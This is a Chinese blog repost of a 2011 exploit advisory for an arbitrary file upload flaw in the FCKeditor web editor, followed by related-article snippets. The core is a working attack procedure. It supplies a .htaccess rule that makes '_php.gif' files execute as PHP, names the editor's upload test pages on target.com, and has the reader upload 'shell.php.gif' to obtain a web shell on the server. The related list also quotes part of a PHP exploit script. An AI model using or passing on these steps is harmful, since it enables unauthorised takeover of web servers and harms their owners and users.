FCKeditor all version File Upload

最新推荐文章于 2024-04-24 15:15:43 发布
最新推荐文章于 2024-04-24 15:15:43 发布
阅读量523 收藏
点赞数
分类专栏: 漏洞收集 文章标签: fckeditor upload file website shell date
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/god_7z1/article/details/6915218
版权
In The Name Of GOD
[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] script:http://sourceforge.net/projects/fckeditor/
[+] Author  : pentesters.ir
[+] Website : WwW.PenTesters.IR
———————————————————
1.create a htaccess file:
code:
<FilesMatch “_php.gif”>
SetHandler application/x-httpd-php
</FilesMatch>
 
2.Now upload this htaccess with FCKeditor.
 
http://target.com/FCKeditor/editor/filemanager/upload/test.html
 
http://target.com/FCKeditor/editor/filemanager/browser/default/connectors/test.html
 
———————————————————————————————-
3.Now upload shell.php.gif with FCKeditor.
4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
5.http://target.com/anything/shell_php.gif
6.Now shell is available from server.
———————————————————
7禧
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
FCKeditor文件上传漏洞及利用-File-Upload-Vulnerability-in-FCKEditor1
08-03
Exploiting PHP Upload Module ofBypassing File-type CheckExploiting PHP Upload Mo
借助pyinstaller为你的python程序添加版本号
Ark_py的博客
04-06 5343
在python源代码py文件打包exe的过程中 往往没办法做的跟其他软件相像,生成的exe文件一点也没有“范儿” 也不能满足一定的需求,今天为大家介绍给程序添加版本号的基本方法。 添加版本号的核心工具就是pyinstaller的–vesion-file设置,可以根据给定的文件添加版本号,这个文件它并没有指明什么类型,什么格式,我们需要自己探索。 网络上很多的文章都有提到一个cmd命令:pyi-g...
FCKeditor 2.0-2.4.3 arbitrary file upload
cnbird's blog
11-11 1011
FCKeditor 2.0-2.4.3 arbitrary file upload
如何用Pyinstaller打包显示版本号的exe程序
Student_cc的博客
02-13 5131
如何用Pyinstaller打包显示版本号的exe程序 参考链接: https://zhuanlan.zhihu.com/p/20731500 https://blog.csdn.net/hurray123/article/details/48521845 关于pyinstaller的用法可以在命令行下输入pyinstaller查看: 重点来看下 –version-file FILE选项的用...
Python打包exe
weixin_43956958的博客
05-11 9007
python实现打包exe有很多方案,主要有py2exe、cxfreeze、PyInstaller三种。 它会把Python运行时和依赖的库打包进来。这对程序员来说没有任何意义,因为他们本来就装了环境,不需要再冗余一份 打包的环境不能正常更新,任何改动都必须整体重新打包一遍 打包后不能跨平台,且不能交叉编译 体积大(相对库本身来说) 安装pyinstaller ...
FCKeditor 2.6.4 php版本任意文件上传——漏洞复现
W小哥
06-17 7005
一、漏洞描述 FCKeditor是目前最优秀的可见即可得网页编辑器之一,它采用JavaScript编写。具备功能强大、配置容易、跨浏览器、支持多种编程语言、开源等特点。它非常流行,互联网上很容易找到相关技术文档,国内许多Web项目和大型网站均采用了FCKeditor。 Fckeditor 低于 2.6.4 php 版本任意文件上传漏洞,当您的PHP环境配置为 GPC = Off 时可绕过currentfolder参数过滤上传脚本木马控制网站服务器 二、漏洞原理 漏洞版本:<=2.6.4 三、环境搭建
fckeditor教程视频链接
04-11
FCKeditor最初是在2003年创建的,后来经过多次更新和改进,成为了一款功能丰富且广泛使用的富文本编辑器,被许多网站和Web应用程序所采用。CKEditor可以通过JavaScript嵌入到网页中,并且具有丰富的插件和自定义选项...
FCKeditor 2.0 简化和使用
10-30
FCKeditor 2.0版终于出来了,之所以用“终于”这个词,是因为在这一版本上加上了众望所归的FLASH插入功能。
FCKEDITOR安装包
01-25
FCKeditor是一个功能强大支持所见即所得功能的文本编辑器,可以为用户提供微软office软件一样的在线文档编辑服务。 它不需要安装任何形式的客户端,兼容...
javascript 获取FCKeditor内容
10-29
javascript获取FCKeditor内容,需要的朋友可以参考下。
pyinstall将py文件打包成可执行程序exe
suyancc的博客
05-01 487
安装 pip install pyinstall 使用 参数 含义 -F, --onefile 打包一个单个文件,只生成一个exe文件。如果你的代码都写在一个.py文件的话,可以用这个,如果是多个.py文件就别用 -D, --onedir 打包多个文件,在dist中生成很多依赖文件,适合以框架形式编写工具代码,代码易于维护,推荐使用 –distpath 指定生成的exe存...
FCKeditor All Version Hacking
weixin_33908217的博客
12-22 50
1. View Editor version FCKeditor / _whatsnew.html ——————————– 2. Version 2.2 release Apache linux environment, followed by one in the uploaded file. Breakthrough test. 3.Version <=...
PyInstaller 系列 - 基本用法
magicggyy的专栏
10-20 3548
https://juejin.im/entry/6844903617720221709 这是本系列的第一篇,介绍 PyInstaller 的基础知识。 PyInstaller 是一个跨平台的 Python 应用打包工具,支持 Windows/Linux/MacOS 三大主流平台,能够把 Python 脚本及其所在的 Python 解释器打包成可执行文件,从而允许最终用户在无需安装 Python 的情况下执行你的程序。 PyInstaller 这个软件有几点容易引起误解的地方。首先,Installer
FCKeditor所有版本任意文件上传缺陷
weixin_30416871的博客
09-04 175
In The Name Of GOD[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability[+] Date: 2011[+] script:http://sourceforge.net/projects/fckeditor/[+] Author: pentesters.ir[+] Website : WwW.Pen...
Python: pyinstaller打包exe(含file version信息)
qq_42992919的博客
08-27 1597
最近项目上一直都是用Spyder直接运行.py文件的方式来执行每日的自动化程序,每天都要手动去点击Run来执行一次,所以考虑把.py文件直接打包成exe,然后用windows的task schedule功能来让它自动每天运行。 用pyinstaller来打包exe文件,同时为了便于维护,给exe文件添加文件版本file version信息。 1. 安装pyinstaller 机器上的python环...
fckeditor <= 2.6.4 任意文件上传漏洞
weixin_30640291的博客
01-06 964
<?error_reporting(0);set_time_limit(0);ini_set("default_socket_timeout", 5);define(STDIN, fopen("php://stdin", "r"));$match = array();function http_send($host, $packet){$sock = fsockopen($host, 80)...
fckeditor2.4.3 编辑器文件上传漏洞
黑面狐
04-24 4682
一个古老的漏洞记录一下。一、环境搭建与利用下载fckeditor2.4.3版本后用phpstudy搭建。2.4.3版本一下存在版本信息泄露查看目录/fckeditor/_whatsnew.html需要修改文件fckeditor\editor\filemanager\browser\default\connectors\php\config.php中的参数$Config['Enabled'] = T...
shell脚本一键安装nginx-1.18.0
misakivv的博客
04-23 286
shell脚本一键安装nginx-1.18.0
Android 14 transtion 动画流程
最新发布
u012627628的博客
04-24 1025
implements Transitions.TransitionHandler 的对象都会调用到startAnimation。根据上步计算出来的sortedTargets计算要做的动画TransitionInfo。此列表在开始做动画时候会判断里面的key,value是否满足做动画的条件。将符合条件的changeInfo添加到targets 返回。计算所有的到mChanges。
fckeditor漏洞
07-27
回答: FCKeditor曾经存在一些漏洞,但是新版FCKeditor已经修复了这些漏洞。\[3\]在以前的版本中,存在一些常见的利用方式,比如通过上传文件来执行恶意代码。\[2\]然而,新版FCKeditor已经修复了这些问题,并且不再容易受到这些漏洞的攻击。因此,如果您使用的是最新版本的FCKeditor,您不需要担心这些漏洞的问题。 #### 引用[.reference_title] - *1* *3* [FCKeditor编辑器漏洞](https://blog.csdn.net/lyshark_lyshark/article/details/125852506)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [【渗透测试】--- FCKeditor文本编辑器漏洞](https://blog.csdn.net/qq_43168364/article/details/111605583)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^koosearch_v1,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值